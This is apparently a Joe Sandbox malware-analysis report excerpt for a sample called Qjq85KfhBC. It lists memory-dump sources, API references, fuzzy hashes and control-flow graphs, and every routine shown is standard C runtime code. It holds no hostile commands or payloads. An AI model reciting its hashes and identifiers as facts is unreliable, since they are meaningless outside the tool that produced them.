                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                        • Opcode ID: d6299068fc7eab0e908b61e53a655d5f7fccd1491cb1a625e361841c5748f143
                                                                                                                                                                                                                                                        • Instruction ID: a8844565931487fcd43ba9964c896b7cc217e62cbb77479149b1cbc2ec67e8d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6299068fc7eab0e908b61e53a655d5f7fccd1491cb1a625e361841c5748f143
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                        • Opcode ID: 46c4b8311298e9ad31078cd903f2b999b07574f92278cdd259266b666e52bf1a
                                                                                                                                                                                                                                                        • Instruction ID: d4ab1969beca9f6fb0193b2f9130f251f1693b739dd7299210ff6300265a5a48
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46c4b8311298e9ad31078cd903f2b999b07574f92278cdd259266b666e52bf1a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92A0243031C101FF5310CF305F4530C35DD55005C070340145005C0030D7304050FF03

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0091654B
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916095
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160A7
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160B9
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160CB
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160DD
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 009160EF
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916101
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916113
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916125
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916137
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 00916149
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 0091615B
                                                                                                                                                                                                                                                          • Part of subcall function 00916078: _free.LIBCMT ref: 0091616D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916540
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916562
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916577
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916582
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165A4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165B7
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165C5
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009165D0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916608
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091660F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091662C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916644
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                                        • Opcode ID: b4a32328d041e44e5a5ad65e620a3e18ac17e6e1cb09633a14851169a79e4c96
                                                                                                                                                                                                                                                        • Instruction ID: 4a32c892f6fdc5fd2878a6cee0daed0cfa10fc862841bd5ab0a63571d7aadba3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4a32328d041e44e5a5ad65e620a3e18ac17e6e1cb09633a14851169a79e4c96
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3314B71B003089FEB60AA7AE805BDA77EDAF84350F54456AF449DB191DE30EDC0CB50

Control-flow Graph: starts at block 914330-914341 (graph not reproduced)
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914344
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914350
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091435B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914366
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914371
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091437C
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914387
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914392
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091439D
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009143AB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: 89a9d37904c178c3016ac0b17b12012d0929f4b4b5824b7bf6f7f26a7e508882
                                                                                                                                                                                                                                                        • Instruction ID: 0ba7f0edf3469a6360402db8982827f0bd362ef1c2f1bd66cf240ab1fb299a78
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89a9d37904c178c3016ac0b17b12012d0929f4b4b5824b7bf6f7f26a7e508882
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E011897670014CFFCB41EF96D942DD93BA5EF88750F5141A6B9084F162DA31DE919B80

Control-flow Graph: starts at block 917ab4-917acd (graph not reproduced)
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009154C8,00000000,?,?,?,00917D05,?,?,00000100), ref: 00917B0E
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00917B46
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00917D05,?,?,00000100,5EFC4D8B,?,?), ref: 00917B94
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00917C2B
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00917C8E
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00917C9B
                                                                                                                                                                                                                                                          • Part of subcall function 009162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00917E5B,?,00000000,?,0091686F,?,00000004,00000000,?,?,?,00913BCD), ref: 00916331
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00917CA4
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00917CC9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2597970681-0
                                                                                                                                                                                                                                                        • Opcode ID: 595ae6996d6feed35c125c4e1183201bf53dc3c732e3f66af79e5e75d4286911
                                                                                                                                                                                                                                                        • Instruction ID: 09f2bf89fc19bcb240c2f8b3a47ee795180b7f04cc0f815d44459f917a0b381b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 595ae6996d6feed35c125c4e1183201bf53dc3c732e3f66af79e5e75d4286911
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5519F7271421BABEB258EA4CC81FEBB7BAEB84750B154629FC44D6240EB74DCC0D690

Control-flow Graph: starts at block 918417-918474 (graph not reproduced)
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00918B8C,?,00000000,?,00000000,00000000), ref: 00918459
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 009184D4
                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 009184EF
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00918515
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00918B8C,00000000,?,?,?,?,?,?,?,?,?,00918B8C,?), ref: 00918534
                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00918B8C,00000000,?,?,?,?,?,?,?,?,?,00918B8C,?), ref: 0091856D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1324828854-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00911E37
                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00911E3F
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00911EC8
                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00911EF3
                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00911F48
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 009161DF: _free.LIBCMT ref: 00916208
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916269
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00916274
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091627F
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162D3
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162DE
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162E9
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009162F4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,009123C8,0091209F,00911AFC), ref: 009123DF
                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009123ED
                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00912406
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,009123C8,0091209F,00911AFC), ref: 00912458
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3852720340-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000008,?,00916D69,?,?,?,009204C8,0000002C,00913F34,00000016,0091209F,00911AFC), ref: 00914428
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091445B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914483
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00914490
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0091449C
                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 009144A2
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                        • Opcode ID: 10e1f9d7f5aefad70512c660316f6baa870f8eca59613309dd3f1b2e7fb06177
                                                                                                                                                                                                                                                        • Instruction ID: 44c4c86dad740d100871d1a504a9cbac3ce48889c7bf51b3926f16f3a91faf49
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10e1f9d7f5aefad70512c660316f6baa870f8eca59613309dd3f1b2e7fb06177
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F02832714648A7C622B735AC09FEB22AE9BCD7B1B258414F52CD61E5EF2488C29121

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 390 9136fc-913724 GetModuleHandleExW 391 913726-913739 GetProcAddress 390->391 392 913749-91374d 390->392 393 913748 391->393 394 91373b-913746 391->394 395 913758-913765 call 91123a 392->395 396 91374f-913752 FreeLibrary 392->396 393->392 394->393 396->395
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009136AD,?,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002), ref: 0091371C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0091372F
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,009136AD,?,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002,00000000), ref: 00913752
                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: 2729059067ceca4ff43df6a5853131d835bec7b539b25b6a19cf585189a090e4
                                                                                                                                                                                                                                                        • Instruction ID: f27865366467ad0b67b9edf3e7ececa1bb9b636b95cce120bc66288bc36b4b4f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2729059067ceca4ff43df6a5853131d835bec7b539b25b6a19cf585189a090e4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDF04F74B5420CBBCB159BA0DC49BEEBFB9EF48756F0080A4F905A21A0DB305A85DA90

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 400 91634d-916372 call 913f72 403 916374-91637c 400->403 404 91637f-9163a5 MultiByteToWideChar 400->404 403->404 405 916444-916448 404->405 406 9163ab-9163b7 404->406 409 916454-916469 call 91123a 405->409 410 91644a-91644d 405->410 407 916403 406->407 408 9163b9-9163ca 406->408 411 916405-916407 407->411 412 9163e5-9163eb 408->412 413 9163cc-9163db call 91ac20 408->413 410->409 415 916409-91642b call 9120b0 MultiByteToWideChar 411->415 416 91643d-916443 call 91646a 411->416 418 9163ec call 9162ff 412->418 413->416 426 9163dd-9163e3 413->426 415->416 428 91642d-91643b GetStringTypeW 415->428 416->405 423 9163f1-9163f6 418->423 423->416 427 9163f8 423->427 429 9163fe-916401 426->429 427->429 428->416 429->411
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009154C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0091639A
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 009163D2
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00916423
                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00916435
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0091643E
                                                                                                                                                                                                                                                          • Part of subcall function 009162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00917E5B,?,00000000,?,0091686F,?,00000004,00000000,?,?,?,00913BCD), ref: 00916331
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1857427562-0
                                                                                                                                                                                                                                                        • Opcode ID: 2eb83c7704344494ee6aea1cbb9bfbd8feab7e7597dbdec42e685764f4b9c753
                                                                                                                                                                                                                                                        • Instruction ID: 07e2b1e22f3ada05ab58db210015cb2e87138bd29242111095fcf2169fef7ae1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eb83c7704344494ee6aea1cbb9bfbd8feab7e7597dbdec42e685764f4b9c753
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F31AB72B0021AABDB259F64DC85EEE7BAAEB44710B044169FC14D62A0E735CD91CBA0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 430 91561e-915633 GetEnvironmentStringsW 431 915635-915655 call 9155e7 WideCharToMultiByte 430->431 432 91568b 430->432 431->432 438 915657 431->438 434 91568d-91568f 432->434 436 915691-915692 FreeEnvironmentStringsW 434->436 437 915698-9156a0 434->437 436->437 439 915658 call 9162ff 438->439 440 91565d-915662 439->440 441 915680 440->441 442 915664-915678 WideCharToMultiByte 440->442 444 915682-915689 call 914869 441->444 442->441 443 91567a-91567e 442->443 443->444 444->434
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00915627
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0091564A
                                                                                                                                                                                                                                                          • Part of subcall function 009162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00917E5B,?,00000000,?,0091686F,?,00000004,00000000,?,?,?,00913BCD), ref: 00916331
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00915670
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00915683
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00915692
Memory Dump Source
• Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
